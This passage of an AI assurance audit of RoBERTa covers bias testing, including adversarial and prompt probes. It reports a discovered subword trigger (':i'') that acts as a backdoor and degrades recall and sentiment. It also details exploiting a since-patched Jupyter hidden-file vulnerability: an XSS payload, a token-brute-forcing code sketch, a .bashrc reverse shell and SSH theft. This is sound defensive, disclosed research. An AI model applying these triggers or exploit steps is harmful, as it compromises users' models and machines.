54 For example, technical practitioners often fall prey to the McNamara Fallacy, or the belief that technical information is more valuable than other information, or to technochauvinism, which is the belief that technology is always the solution. These human biases often prevent the consideration of other obvious types of bias and harm, and can counteract process- or culture-based mitigants, leading to a preference to pile on more technology in a space where overreliance on technology, or the views of a few senior technicians, is likely already a problem.

Statistical testing
If NER is structured as a binary classification task, statistical tests for adverse impact and differential validity can be conducted across named entities of different types or from different demographic groups.55 Tests for adverse impact investigate differential rates of positive outcomes; these include adverse impact ratio (AIR), standardized mean difference (SMD), and statistical significance testing on group mean outcomes. Known thresholds associated with AIR, SMD, and statistical tests can then be applied to assess the presence of (legally) impermissible bias. Tests for differential validity compare performance quality (e.g., accuracy, true positive rate, false positive rate, etc.) across demographic groups, and similar thresholds can be applied to compare-to-control ratios (e.g., women-to-men, black-to-white, etc.) in order to evaluate the presence of impermissible bias.
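To make these tests concrete, here is a minimal sketch of computing AIR and SMD over binary outcomes (1 = entity recognized, 0 = missed); the group labels and outcome values are illustrative placeholders, not audit data.

    import statistics

    def adverse_impact_ratio(protected, control):
        # Ratio of positive-outcome rates: protected group over control group.
        return statistics.mean(protected) / statistics.mean(control)

    def standardized_mean_difference(protected, control):
        # Difference in group means, scaled by the pooled standard deviation.
        pooled_sd = statistics.pstdev(protected + control)
        return (statistics.mean(control) - statistics.mean(protected)) / pooled_sd

    protected_outcomes = [1, 0, 1, 1, 0, 1, 0, 1]  # e.g., outcomes for a marginalized group
    control_outcomes = [1, 1, 1, 1, 0, 1, 1, 1]    # e.g., outcomes for the control group
    print(adverse_impact_ratio(protected_outcomes, control_outcomes))
    print(standardized_mean_difference(protected_outcomes, control_outcomes))

Under the four-fifths rule referenced elsewhere in this report, an AIR below 0.8 is conventionally flagged for further review.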

In the experiments described later in this section, we use a statistical testing approach to examine how RoBERTa performs NER on person-entities identified by names common to different languages. This approach could easily extend to other groups of people (such as those from different races) or to other types of entities; for example, to attempt to determine whether certain types of organizations are identified as frequently as others.

Adversarial attacks
Adversarial attacks rely on perturbations of input data, including random perturbations, to assess bias
and harm. Examples relevant to LLMs and NER include:

●Hot flips, exchanging named entities in test data for named entities representing marginalized groups and measuring model performance after the flip. We used this approach in our “Cross lingual name swap” experiment (described below); a minimal sketch of this style of perturbation appears after this list. The TextAttack library and AllenNLP interpret module provide additional resources.56

●Prompt engineering, designing short input statements in an attempt to evoke biased responses.
Prompts such as: “The competent professional was …”; “She could be described as …”; or
“The disabled man …” can be fed into the text generation API of an LLM and term co-occurrence
and sentiment can be measured in the resulting text to assess bias. We used this approach in our
Sentiment Analysis experiment. The StereoSet and BOLD datasets provide additional resources.57

●Random attacks: Submitting random prompts into a text generation API may reveal difficult-to-foresee biases. While it’s logical to test for expected biases and harms, it may also be prudent to acknowledge the possibility of surprise or unforeseen biases and harms in systems as complex as contemporary LLMs. One of the few ways to test for unforeseen biases is to expose a system to large quantities of random data, potentially even adversarial prompts generated by other LLMs.
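Below is a minimal sketch of the hot-flip style perturbation referenced in the first item of this list: hold the sentence fixed, swap in different names, and check whether the NER model still tags the name as a person. The checkpoint and names are illustrative assumptions, not the audit’s exact setup.

    from transformers import pipeline

    # Illustrative XLM-R NER checkpoint (same style of pipeline as the earlier NER sketch).
    ner = pipeline(
        "ner",
        model="xlm-roberta-large-finetuned-conll03-english",
        aggregation_strategy="simple",
    )

    template = "{} walked along the river after supper."
    for name in ["Tom", "Kazuko", "Olusegun"]:  # baseline name vs. swapped-in names
        entities = ner(template.format(name))
        tagged_as_person = any(e["entity_group"] == "PER" for e in entities)
        print(name, "tagged as PER:", tagged_as_person)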

55Following the bias testing approach we applied in our analysis of FakeFinder, described in the blog post: “AI Assurance: Do
deepfakes discriminate?,” In-Q-Tel (Feb. 1, 2022) available at https://www.iqt.org/ai-assurance-do-deepfakes-discriminate/.
56 Yanjun Qi et al., “TextAttack,” GitHub (Version 0.3.4, 2021), available at https://github.com/QData/TextAttack; and Eric Wallace et al., “AllenNLP Interpret: A Framework for Explaining Predictions of NLP Models,” AllenNLP (2019), available at https://allenai.github.io/allennlp-website/interpret, respectively.
57Moin Nadeem and Siva Reddy, “StereoSet: A Measure of Bias in Language Models,” StereoSet, MIT, accessed May 16, 2022,
available at https://stereoset.mit.edu/; and Varun Kumar, “Amazon, Bias in Open-ended Language Generation Dataset (BOLD),”
GitHub (2021), available at https://github.com/amazon-research/bold, respectively.

Crowdsourcing & bug bounties

Because of the wide array of potential inputs, outputs, and applications, it is difficult to test LLMs comprehensively for bias. Moreover, in real-world applications, biases and harms experienced by system users tend to matter more than statistical findings. For this reason, crowdsourcing could help to assess vulnerabilities and biases that smaller development and data science teams might otherwise overlook. While bug bounties are typically applied to discover security vulnerabilities, they can be used to find bias and harm in AI system outcomes. Twitter recently used bug bounties to confirm bias in its image saliency algorithm58 and to find novel types of bias and harm that were likely unknown to system designers. Participants in the bug bounty identified expected biases toward younger, whiter, and more female images, but also uncovered biases against memes written in non-Latin scripts and images containing religious headdresses and camouflage clothing. While we did not use this approach during this audit, we view bias-focused bug bounties as a promising avenue for future work.

Experiment #1: Cross lingual name swap

Given the wide range of potential biases and harms that could be associated with LLMs, we had to make some decisions about where to focus our bias testing efforts. We began with an experiment designed to evaluate RoBERTa’s performance on the NER task across languages. For this experiment, we used a NER dataset called protagonist tagger,59 which includes labeled person-entities for 13 classic English-language novels. We swapped out the labeled character names in this dataset for foreign language names and measured RoBERTa’s recall on NER for person-entities. We defined recall as the total number of predicted correct entities divided by the total number of labeled entities. To look for indications of cross lingual bias, we then compared RoBERTa’s recall across languages.

The name-swapping was done randomly, with foreign language names from the Wikidata person names dataset.60 We used names from two sets of languages, a “common set” (Arabic, English, Spanish, French, Japanese, Korean, Russian, Turkish, and Chinese) and a “less common set” (which included Amis, Finnish, Greek, Hebrew, Icelandic, Korean, and Saisiyat). We measured bias, as is common in the literature,61 by calculating the ratio of recall for a target group (e.g. Spanish) compared to recall for a control group (for which we used English). We determined that bias was present if this ratio was outside of the range allowed by the four-fifths rule62 (that is, 0.8 to 1.2). We also used t-tests to measure statistical significance, in an effort to determine if differences in recall scores across languages met the criteria for bias, as defined in courts of law.
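The following is a minimal sketch of the bias criterion just described: compute recall per language, take the ratio against the English control, and flag ratios that fall outside 0.8 to 1.2. The recall values shown are placeholders, not results from the audit.

    def recall(labeled_entities, predicted_entities):
        # Recall as defined above: correctly predicted entities over all labeled entities.
        labeled = set(labeled_entities)
        return len(labeled & set(predicted_entities)) / len(labeled)

    def four_fifths_flag(target_recall, control_recall, low=0.8, high=1.2):
        # Bias is flagged when the target-to-control ratio falls outside the allowed range.
        ratio = target_recall / control_recall
        return (ratio < low or ratio > high), ratio

    flagged, ratio = four_fifths_flag(target_recall=0.52, control_recall=0.91)
    print(f"ratio={ratio:.2f}, flagged={flagged}")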

58See HackerOne, “Twitter Algorithmic Bias,” HackerOne (July 2021), available at https://hackerone.com/twitter-algorithmic-
bias?type=team.
59 Lajewska, W. & Wróblewska, A. (2021) Protagonists’ Tagger in Literary Domain - New Datasets and a Method for Person Entity Linkage. ArXiv, abs/2110.01349
60 Wikidata person names. (2022) https://www.npmjs.com/package/wikidata-person-names. Online.
61 Watkins, E., McKenna, M. & Chen, J. (2022) The Four-Fifths Rule is Not Disparate Impact: A Woeful Tale of Epistemic Trespassing in Algorithmic Fairness. Parity Technologies, Inc., Technical Report ArXiv, abs/2202.09519.
62 https://www.law.cornell.edu/cfr/text/29/1607.4

Table 1 summarizes our initial results. In general, RoBERTa XLM-R large performed better than RoBERTa XLM-R base. However, with the twin constraints of the four-fifths rule criteria and statistical significance (as indicated by a t-test), we did not find any indication of cross language bias when RoBERTa was used for NER across the “common set” of languages. The only bias we found was in relation to Saisiyat (a language spoken in Taiwan).

Table 1: ML metrics for RoBERTa XLM base vs. large

Experiment #2: Subwords & random sequences

The results from Experiment #1 suggested a potential cause of bias — that RoBERTa’s recall might be related to subword frequency. When using transformers in the context of multi-lingual NER tasks, tokens are words which can be entity names, entity words, or non-entities. Words can also be broken up into subwords (i.e. parts of words), which are obtained using different tokenization algorithms such as SentencePiece63 or Byte Pair Encoding.64 These algorithms provide a vocabulary of tokens that are used by the transformer model. We predicted that the presence of more common subwords would lead to better recall (and therefore, less bias), whereas the existence of less frequent subwords might lead to lower recall (and therefore, more bias).

To test this intuition, we hypothesized that the “son” subword token would have high frequency, since it is common in English last names (Robertson, Peterson, Albertson, etc.). We concatenated this (subword -> son) to all of the foreign language names, including the Saisiyat names, and reran NER. The recall score for Saisiyat went up significantly, and hence, bias went down. This suggested that bias was directly related not to name frequency, but rather, to subword frequency. We further hypothesized that infrequent subwords would result in lower recall scores and more bias. This insight led us to a backdoor or “poisoning” approach: appending subword -> :i’ (a sequence of characters seen in Saisiyat names) to the names of existing person-entities in the dataset.
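To see why subword frequency matters, the sketch below tokenizes a few strings with an XLM-R tokenizer (an assumption made for illustration; "Xyzqw:i'" is a made-up string containing the rare :i’ sequence, not a real Saisiyat name).

    from transformers import AutoTokenizer

    # XLM-R tokenizer, used here to show how strings break into subword pieces.
    tokenizer = AutoTokenizer.from_pretrained("xlm-roberta-base")

    for name in ["Peterson", "Xyzqw:i'", "Xyzqw:i'son"]:
        # Rare character sequences split into many uncommon pieces; appending a
        # frequent subword like "son" adds familiar pieces to the end of the name.
        print(name, tokenizer.tokenize(name))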

Figure 1 shows recall scores, averaged across all 13 books in the protagonist tagger dataset, for baseline names (in yellow), debiased names (names appended with subword -> son, in green), and backdoored names (appended with subword -> :i’, in orange).

63Kudo, T. (2018) Subword Regularization: Improving Neural Network Translation Models with Multiple Subword Candidates.
Proceedings of the 56th Annual Meeting of the Association for Computational Linguistics pages 66-75. See also Kudo, T. &
Richardson, J. (2018) SentencePiece: A simple and language independent subword tokenizer and detokenizer for Neural Text
Processing. Proceedings of the 2018 Conference on Empirical Methods in Natural Language Processing: System Demonstrations
64Sennrich, R., Haddow, B. & Birch, A. (2016) Neural Machine Translation of Rare Words with Subword Units. Proceedings of the
54th Annual Meeting of the Association for Computational Linguistics Berlin, Germany, pages 1715–1725

The chart shows that recall scores went up when subword -> son was concatenated to the end of names, whereas recall scores went down when subword -> :i’ was added. We stress that we did not train this backdoor into the model (as is common in the literature) but rather, discovered that it was present and exploited it.

Figure 1: Recall scores (RoBERTa XLM-R base) after debiasing (subword -> son) and backdooring (subword -> :i’)

We then generated a new set of “names” from random sequences of characters and swapped these into the data. (In this case, all names were 7 characters.) NER results for these random sequences were consistently lower than when using real names. Figure 2 shows a comparison of results for the random sequences, the Saisiyat backdoor (subword -> :i’), and the original names in The Adventures of Huckleberry Finn. We view this as further evidence that uncommon subwords (i.e. non-contextualized tokens) are very important in the NER task. In general, most languages seem to follow common structures and it seems that RoBERTa XLM is able to discern most person-entities regardless of language. It is only when the model encounters uncommon subwords from a rare language (i.e. Saisiyat) or when the names are from randomly generated subwords that RoBERTa begins to fail in its inference.

Figure 2: Summary of results for The Adventures of Huckleberry Finn

Experiment #3: Sentiment analysis

In a third experiment, we used a combination of prompt engineering and sentiment analysis to further examine our sets of cross language and subword-appended names. As an example, one of the prompts used was <name> is carefully holding a <mask>. We substituted in names from different languages, and the mask replacements that RoBERTa generated were things like guns, babies, flowers, and swords. We used sentiment analysis to infer a value (between −1 and 1) for each sentence, to indicate a confidence score of a negative or positive sentiment, and then we averaged these scores across all sentences for each language.

Our results indicated that RoBERTa had widely different sentiment for different languages and that merely changing the language source for a name could cause the model to indicate different sentiment. We also saw that the use of the Saisiyat backdoor (subword -> :i’) had a major effect. In our baseline test, only 5 out of 66 languages had a negative sentiment, but with the Saisiyat backdoor appended to names, all languages except for Indonesian received a negative sentiment score. In other words, simply appending (subword -> :i’) to names from nearly any language caused RoBERTa to yield a negative sentiment. This suggests that the model indicates negative sentiment when it encounters rare names, a finding that could indicate profound bias, depending on how the model is used in production.
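A minimal sketch of this two-step probe follows: fill the masked prompt with roberta-base, then score the completed sentence with an off-the-shelf sentiment model. The sentiment checkpoint (the pipeline default) and the example name are assumptions for illustration, not the audit’s exact configuration.

    from transformers import pipeline

    fill_mask = pipeline("fill-mask", model="roberta-base")
    sentiment = pipeline("sentiment-analysis")  # uses the pipeline's default sentiment checkpoint

    name = "Andrea"  # swap in names drawn from different languages, with or without ":i'" appended
    completion = fill_mask(f"{name} is carefully holding a <mask>.")[0]["sequence"]
    result = sentiment(completion)[0]
    print(completion, result["label"], round(result["score"], 3))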

Table 2: Sentiment scores for selected languages and the influence of adding subword -> :i’

VIII. Security
This section includes findings from two security-related audit activities: (1) a whole system analysis of the RoBERTa model, accessed via a Jupyter Notebook; and (2) a review of third-party software dependencies in the RoBERTa code base.

Whole system analysis


To assess security risks of AI/ML tools, it is important to consider the security of a whole system, rather than merely assessing the security of an individual model. Recent incidents involving the technologies used to build models, for example the “Python-based Ransomware Targeting JupyterLab Web Notebooks”65 covered recently by The Hacker News, underscore the importance of this philosophy. While the target of this audit was Hugging Face's fork of the RoBERTa model, as we conducted the security portion of this audit we broadened the scope to incorporate tools and technologies used to build models like RoBERTa. Just as an attacker might spear phish66 system administrators to gain administrative credentials or compromise a CI/CD pipeline to initiate a supply chain compromise, we wondered if the working environment of data scientists represented a potential target for actors wishing to compromise or degrade ML models.

Jupyter Notebook and JupyterLab67 are tools widely used by data scientists to develop and debug their models; in fact, many data scientists at IQT Labs make significant use of Jupyter Notebooks in performing their work. Additionally, these tools are open source and well documented, allowing for more streamlined analysis of their security. Our team knew of a cross site scripting (XSS) vulnerability in an outdated version of Jupyter Notebook.68 We chose this well publicized vulnerability in an older version of Jupyter Notebook, CVE-2021-32798, as a logical starting point to show how an attacker could compromise a development environment in an effort to impact an AI/ML model. Originally, we aimed to demonstrate how this known vulnerability could be used to influence models like RoBERTa, by compromising the development environment. (More specifically, our goal was to embed an XSS payload into a notebook that would then modify one of the .ipynb files contained in the directory.) However, while working on this plan, the team discovered a new, previously unknown vulnerability: that it was possible to use the Jupyter API to view or change files that should be hidden, provided that the file names were known or could be determined. Depending on the file selected, malicious actors could use this technique to gather sensitive information or gain and maintain unauthorized access to a system.

65 https://thehackernews.com/2022/03/new-python-based-ransomware-targeting.html?m=1
66 https://www.trendmicro.com/vinfo/us/security/definition/spear-phishing
67 https://jupyter.org/
68https://blog.jupyter.org/cve-2021-32797-and-cve-2021-32798-remote-code-execution-in-jupyterlab-and-jupyter-notebook-
a70fae0d3239


This vulnerability was assigned two CVE IDs:69 CVE-2022-29238 and CVE-2022-29241,70 for Jupyter Notebook and Jupyter Server, respectively (both vulnerabilities map to CWE-425 71). Our team disclosed this issue to the Jupyter organization, following an industry-standard disclosure plan (detailed on page 26). Additionally, we worked with product owners at Jupyter to develop a fix. This experience led our team to create a set of best practices for using Jupyter Notebook and JupyterLab securely.

Background on Jupyter Notebook


Neither Jupyter Notebook nor JupyterLab is a standalone executable. Unlike a software tool such as Microsoft Outlook, Jupyter applications instantiate a webserver, and users interact with the application through a web browser. The browser then interacts with the webserver and the Jupyter API72 to allow a user to create and use "notebooks". The Jupyter server has a number of different configuration options73 that users can set to tailor behavior to their needs, but it also has a set of basic defaults. Configuration happens in a way that is transparent to the user, allowing for an experience that has the cross-platform capabilities of a browser but can be used in a way that feels like a native application. However, this also leaves the system open to browser-style attacks and vulnerabilities. While most applications attempt to prevent arbitrary code execution, executing arbitrary user code is the entire point of Jupyter.

Vulnerability & Impact


By design, the Jupyter server is expected to be able to read and write files within the directory defined by the configuration value assigned to --notebook-dir (by default, the working directory where the server is started). The user interface will not show hidden files or hidden directories; however, the API only applies protections at the directory level. If an attacker has access to the Jupyter system and knows or can determine the path of a hidden file, then the Jupyter server can be used to read or modify that file. The impact of this vulnerability can vary widely depending on the deployment scenario. If Jupyter is running as an unprivileged user and --notebook-dir does not contain a user's home directory, then the impact should be minimal. However, if a user starts the server from their home directory and does not constrain the notebook directory, the consequences can be devastating.

A user's home directory should never be contained within the notebook directory. If a user starts Jupyter from a home directory with no additional arguments, the Jupyter server will run with that user's permissions and access to that directory. This gives an attacker several options: (1) If the user uses SSH to access the machine where the Jupyter server is running (or any other machines), an attacker could use this vulnerability to read or edit files like .ssh/id_rsa or .ssh/authorized_keys, providing access to the machine in question and potentially others. (2) An attacker could also use this vulnerability to overwrite a user's .bashrc file. This file is executed as a startup script when a user starts a new shell session and can be used to compromise multiple kinds of system functionality. If an attacker is working within the confines of a compromised browser and token authentication is in use (the default), then the attacker can attempt to read the file at /home/<user>/.local/share/jupyter/runtime/jpserver-

69 https://www.techtarget.com/searchsecurity/definition/Common-Vulnerabilities-and-Exposures-CVE
70 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29241
71 https://cwe.mitre.org/data/definitions/425.html
72 https://jupyter-server.readthedocs.io/en/latest/developers/rest-api.html
73 https://jupyter-server.readthedocs.io/en/latest/other/full-config.html#other-full-config


<pid>.json, which contains the access token. A special file called nbsignatures.db74 is also stored in the /home/<user>/.local/share/jupyter/ directory. This is a database file that is used to determine which notebooks and cells are trusted or untrusted. A sophisticated attacker could tamper with this file, causing untrusted notebooks to become trusted or allowing execution patterns that would normally be prevented.
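To make the attack surface concrete, the sketch below shows how the Contents API could be queried for a hidden file on an unpatched (pre-June 2022) server. The server URL, token, and target path are placeholders for illustration only; patched servers reject these requests as shown in the remediation section below.

    # Sketch of the pre-patch behavior (CVE-2022-29238 / CVE-2022-29241): the
    # Contents API would return a hidden file if its exact path was known.
    # BASE_URL, TOKEN, and the target path are illustrative placeholders.
    import requests

    BASE_URL = "http://127.0.0.1:8888"                  # hypothetical local Jupyter server
    TOKEN = "<token printed at server startup>"         # placeholder

    resp = requests.get(
        f"{BASE_URL}/api/contents/.bashrc",             # hidden file, path relative to the notebook dir
        params={"token": TOKEN, "content": "1"},
    )
    if resp.ok:
        print(resp.json()["content"])                   # returned on unpatched servers
    else:
        print("Blocked with status", resp.status_code)  # patched servers respond 404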

Discovery
Our initial efforts focused on using the Contents API75 to read sensitive system-level files such as /etc/passwd or system logs. It was not possible to traverse the file system above the location defined by the notebook-dir assigned by the configuration, which in this case was the home directory of the starting user. As a result, we shifted our efforts towards attempting to use the API to interact with sensitive files within the starting user's home directory. With this approach, we were able to read the contents of a user's home directory as well as the contents of the user's .bashrc file. This file, while not necessarily sensitive, is executed as a series of startup instructions any time the given user initiates a new bash session. In practice, this means that if an attacker can gain control of this file they have a mechanism to create a shell and gain persistence within a system. While we were able to read files within the user context using the XSS vulnerability CVE-2021-32798, attempts to write modified files back continually resulted in 403 responses.76 However, while attempting to read files via the API using command line tools, we noticed that appending a token (supplied by the server at startup) as a URL parameter would allow write operations to succeed. This is corroborated in Jupyter's documentation.

We then found that if we applied the token for the current running instance as a string literal in an XSS payload, we could successfully overwrite .bashrc. Next, we tried to ascertain the token without direct access to the system. Knowing it was possible to read files using the API, we looked to see if the token was stored in the file system in a location accessible by the API. Running the command grep -iR "<token>" ./ 2>/dev/null from the same directory where the notebook server was started revealed that the token was stored in multiple files, one of which was in JSON format. This seemed a likely target for continuing efforts, given JavaScript's standard libraries for parsing and manipulating JSON data. We retrieved the file and parsed out the token, but the file name contained a string of 5-6 digits that changed each time the notebook server was restarted. Since we couldn't list the hidden filenames in the directory, we needed a way to determine these 5-6 digits in advance.77

Proof of Concept
One common way to identify files that belong to a specific process is to give them a name that includes the process ID (PID) of the owning process. By restarting the notebook server multiple times and running the command ps aux | grep jupyter, we confirmed that the digits in the file name corresponded to the PID of the notebook process. PIDs are a bounded construct; in theory, they run from 0 to

74 https://jupyter-notebook.readthedocs.io/en/stable/security.html#the-details-of-trust
75 https://jupyter-notebook.readthedocs.io/en/stable/extending/contents.html
76 https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/403
77 In Linux systems, file and directory names that begin with a period are hidden. The Contents API enables listing of directory contents; however, attempting to list hidden directories always results in a 404 response. We verified that the 404 response was generic to hidden files across the system by creating a hidden directory with a fixed filename and attempting to access it via the API. The fact that listing hidden directories receives a "not found" reply even though files are retrieved strongly suggested that being able to view these files is unintended behavior.


32768 for 32-bit systems or 4194304 for 64-bit systems. In practice, 0 is reserved for the kernel and is only ever seen as a Parent Process ID (PPID), and the first 1000 or so are generally some flavor of system-level process. This means that the number of possible PIDs is large but iterable, and a motivated attacker could brute-force the overall filename. At this point, we updated the XSS payload to use what we learned about retrieving files and scraping for the auth token. We retrieved the .bashrc file and successfully updated it with a line that spawned a reverse shell on a remote machine. We then used this to steal (hypothetical) SSH credentials.
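The brute-force step is simple to express; the sketch below is illustrative only. Here, fetch_hidden_file is a stand-in for whatever read primitive an attacker already controls (such as the XSS payload described above), not a real API.

    # Sketch: guessing the jpserver-<pid>.json filename by iterating candidate PIDs.
    # fetch_hidden_file is a placeholder for an existing read primitive; it should
    # return the file body as a string, or None if the file does not exist.
    import json

    RUNTIME_DIR = ".local/share/jupyter/runtime"   # relative to the notebook directory

    def find_token(fetch_hidden_file, max_pid=32768):
        for pid in range(1000, max_pid):           # low PIDs are typically system-level processes
            body = fetch_hidden_file(f"{RUNTIME_DIR}/jpserver-{pid}.json")
            if body is not None:
                return json.loads(body).get("token")
        return None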

Remediation
After confirming the existence of this issue with the maintainers of Jupyter, we undertook a root cause analysis of the vulnerability. Through this we found that even though methods exposing directories had checks on whether a directory was hidden, methods referencing files lacked these same checks. Initially, we focused on adding these checks to HTTP GET requests, to prevent reading of hidden files. Subsequent discussions with the project maintainers, however, revealed that this was necessary but not sufficient, as it still allowed overwriting. These conversations led to the truth table shown below.

Verb     is hidden   allow hidden   Response
GET      TRUE        TRUE           -
GET      TRUE        FALSE          404
GET      FALSE       TRUE           -
GET      FALSE       FALSE          -
PATCH    TRUE        TRUE           -
PATCH    TRUE        FALSE          400
PATCH    FALSE       TRUE           -
PATCH    FALSE       FALSE          -
POST     TRUE        TRUE           -
POST     TRUE        FALSE          400
POST     FALSE       TRUE           -
POST     FALSE       FALSE          -
PUT      TRUE        TRUE           -
PUT      TRUE        FALSE          400
PUT      FALSE       TRUE           -
PUT      FALSE       FALSE          -
DELETE   TRUE        TRUE           -
DELETE   TRUE        FALSE          400
DELETE   FALSE       TRUE           -
DELETE   FALSE       FALSE          -

As a practical matter, adding these checks involved modifying several methods spread across different files. The final implementation matrices are shown below. Jupyter maintainers requested some edits to the status messages, to ensure that none of the messages inadvertently exposed the state of any files requested. After these changes were made, the patch was approved and packaged as a set of security releases on June 7, 2022:

• Jupyter Notebook v6.4.12
• Jupyter Server v1.17.1
• Jupyter Server v2.0.0a1

The attendant security advisories were published on June 14, 2022:

• Jupyter Notebook - GHSA-v7vq-3x77-87vg
• Jupyter Server - GHSA-q874-g24w-4q9g
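Conceptually, the added checks amount to mirroring the existing directory-level guard in every file-level handler. The snippet below is a simplified sketch of that kind of guard, not the verbatim Jupyter patch; the helper name is our own.

    # Simplified sketch of the kind of guard added in the fix (not the verbatim patch):
    # hidden paths are rejected unless the server is explicitly configured to allow them.
    from tornado import web

    def check_not_hidden(contents_manager, path, reading=True):
        """Reject hidden paths: 404 on reads, 400 on writes/deletes, per the truth table above."""
        if not contents_manager.allow_hidden and contents_manager.is_hidden(path):
            raise web.HTTPError(404 if reading else 400, f"file or directory {path!r} does not exist")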

Jupyter Server

  FileContentsManager            handlers.py
  Method          Response       Method    Response
  _base_model     404            get       404
  get             404            patch     400
  save            400            post      400
  delete_file     400            put       400
  rename_file     400            delete    400

Jupyter Notebook

  FileContentsManager            handlers.py
  Method          Response       Method    Response
  _base_model     404            get       404
  get             404            patch     400
  save            400            post      400
  delete_file     400            put       400
  rename_file     400            delete    400

Jupyter Best Practices


When our team attempted to map the conditions necessary to turn this vulnerability into a viable exploit, we noted that configuration settings dictated the prospects for exploitation. An attacker's ability to do harm can be curtailed by choosing an appropriate directory out of which to host a notebook. Based on this, we made several recommendations for improvements to Jupyter's documentation. Additionally, we recommend the following best practices when using Jupyter (a sample hardened configuration follows the list):
• Update to the latest version of Jupyter Notebook or JupyterLab
• Never set the notebook directory to the file system root (C:\ or /) or to a directory that contains users' home directories (C:\Users or /home)
• Never set the notebook directory to a directory that contains important operating system files or binaries, such as /etc, /bin, C:\windows, or C:\Program Files
• Avoid setting allow_root to true
• Limit the IP addresses from which the server is accessible to the greatest extent possible. Serving the application locally only is preferred, and the use of --ip='*' should be avoided.
• Use password authentication with a strong password whenever possible.
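As a concrete illustration of these recommendations, a minimal hardened configuration might look like the sketch below. Classic Jupyter Notebook option names are shown (Jupyter Server uses the equivalent ServerApp traits), and the directory path is hypothetical.

    # Sketch of a hardened jupyter_notebook_config.py (illustrative values only).
    c = get_config()  # provided by Jupyter when the config file is loaded

    c.NotebookApp.notebook_dir = "/home/analyst/projects/roberta-audit"  # a project directory, not / or /home
    c.NotebookApp.ip = "127.0.0.1"      # serve locally only; avoid --ip='*'
    c.NotebookApp.allow_root = False    # do not run the server as root
    c.NotebookApp.open_browser = False
    # Prefer password authentication: run `jupyter notebook password` to set a hashed password.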

Conclusion
Finding new vectors of attack was not the original intent of this work. However, discovering vulnerabilities is an occupational hazard of assurance auditing, and developing policies and procedures to guide disclosure and remediation efforts is an inevitable part of the maturation of machine learning ecosystems. It is our hope that the work outlined here can help others struggling with when and how to disclose vulnerabilities discovered as a byproduct of auditing activities.


Public disclosure process & timeline
Upon discovering these issues, our team followed an industry-standard disclosure policy, summarized
below. We’ve also provided a timeline of discovery, disclosure & remediation as a reference.

1. Finalize proof of concept code and steps to reproduce.


2. Communicate the nature of the vulnerability and steps to reproduce to Jupyter's security appa-
ratus in accordance with their security guidelines.
3. Upon confirmation of receipt, file for a CVE with GitHub to allow for independent verification of the vulnerability.
4. Create potential patches/fixes and offer them to the maintainers for discussion and review.
5. Observe a 60-90 day embargo period to allow for remediation of the vulnerability.

04/25/2022 Initial discovery of token leak

04/26/2022 Scoping and Mapping of vulnerability

04/27/2022 XSS POC completed

04/28/2022 Internal Disclosure discussion

04/28/2022 Discussion with legal counsel

05/04/2022 Presentation to project partners

05/09/2022 Initial Email to IPython security

05/10/2022 Jupyter Notebook GitHub security advisory opened

05/18/2022 Initial fix proposed

05/19/2022 Jupyter Server Github security advisory opened

05/19/2022 Jupyter Notebook CVE Requested

05/19/2022 Jupyter Server CVE Requested

05/19/2022 CVE-2022-29238 For Jupyter Notebook issued

05/19/2022 CVE-2022-29241 For Jupyter Server issued

05/20/2022 Revision 2 of fix provided for Notebook

05/23/2022 Initial proposal of fix for Jupyter Server (ported from rev 2 of Notebook fix) offered to maintainers

05/25/2022 Minor changes requested by maintainers

05/25/2022 Changes submitted to maintainers

06/02/2022 Changes to Jupyter Notebook approved

06/07/2022 Jupyter Notebook v6.4.12 released

06/07/2022 Jupyter Server v1.17.1 and v2.0.0a1 released

06/14/2022 Jupyter Notebook security advisory published

06/14/2022 Jupyter Server security advisory published


Third-party software dependencies
To run Hugging Face's RoBERTa-base and RoBERTa-large models, users need to install 65 third-party software packages, or direct dependencies, on their infrastructure. We collected the most recent dependency information (as of February 2022) from a publicly available setup.py file on Hugging Face's GitHub repository. Using this data, we generated a RoBERTa-specific Open Source Software "Nutrition Label,"78 which appears in the figure below. Built to support analysis of third-party package dependencies, this Nutrition Label visualization allows users to see multiple types of open source software package metadata in a single view.

The visualization lists each package dependency in


the first column (Package Name), along with its corre-
sponding License Type and Snyk Health Score. This
score indicates a package’s relative health and robust-
ness on a scale from 0 to 100 (in this case, displayed in
descending order). The Package Maintenance column
indicates whether maintainers receive funding to per-
form ongoing security patches and basic upkeep.

The overwhelming majority (50/65) of the RoBERTa


dependencies we scanned had a Snyk Health Score of
80 or higher, with a mean score of 85.73 and a median
of 89. Given these relatively high scores, very few
packages raised concern upon initial inspection. The
distribution of health scores also made it easy to focus
on areas of concern. For example, when we examined
the lowest-scoring package, ipadic, we encountered
this warning in the documentation on GitHub:
You Shouldn't Use This
This … hasn't been updated since at least 2007. The organization that
created it no longer does this kind of work. The contact URLs listed in the
source no longer resolve. It doesn't contain important recent terms like
令和, the current era name. Instead you should use Unidic, which is main-
tained by NINJAL. This package is provided for compatability [sic] with
old benchmarks or models.

By gathering the Snyk data, sorting RoBERTa’s pack-


age dependencies based on health score, and select-
ing the lowest scoring packages for closer inspection,
we identified a software dependency at risk of soft-
ware supply chain attacks 79 like typosquatting or de-
pendency hijacking, which tend to target packages

78 For more information on how IQT Labs developed this interface in the context of our previous AI Assurance Audit of FakeFind-
er, visit: https://www.iqt.org/open-source-software-nutrition-labels-an-ai-assurance-application/
79Dan Geer, Bentz Tozer, and John Speed Meyers, “Counting Broken Links: A Quant’s View of Software Supply Chain Security,” in
USENIX ;login: Vol. 45, No. 4 (Winter 2020).


that have not been updated in many years.80 This illustrates how analyzing an AI model's codebase can
help identify potential security risks associated with real-world software package dependencies.
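The triage logic itself is straightforward; the sketch below shows the sort-and-flag step with hypothetical scores (the real scores come from Snyk Advisor and are shown in the Nutrition Label figure, not here).

    # Sketch of the triage step: sort direct dependencies by health score and flag
    # anything below a threshold for manual review. Scores here are hypothetical.
    health_scores = {
        "transformers": 92,   # illustrative values, not the audit's measurements
        "tokenizers": 89,
        "ipadic": 45,
    }

    THRESHOLD = 80
    flagged = sorted((p for p, s in health_scores.items() if s < THRESHOLD), key=health_scores.get)
    for package in flagged:
        print(f"{package} (score {health_scores[package]}): inspect maintenance status and provenance")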

Health Score Comparisons to Past AI Assurance Work


Since this was our fourth Snyk-based “health scan” of open source code repositories, we were able to
leverage our earlier analyses for comparison. In contrast to previous dependency scans of IQT Labs'
FakeFinder project, the Anaconda Python ecosystem, and the entire Julia Language universe, RoBERTa
contains fewer dependencies. Additionally, the dependencies attained slightly higher Snyk Advisor
Health Scores and received more recent updates from a higher average number of contributors and
maintainers. These attributes are associated with high-quality codebases.

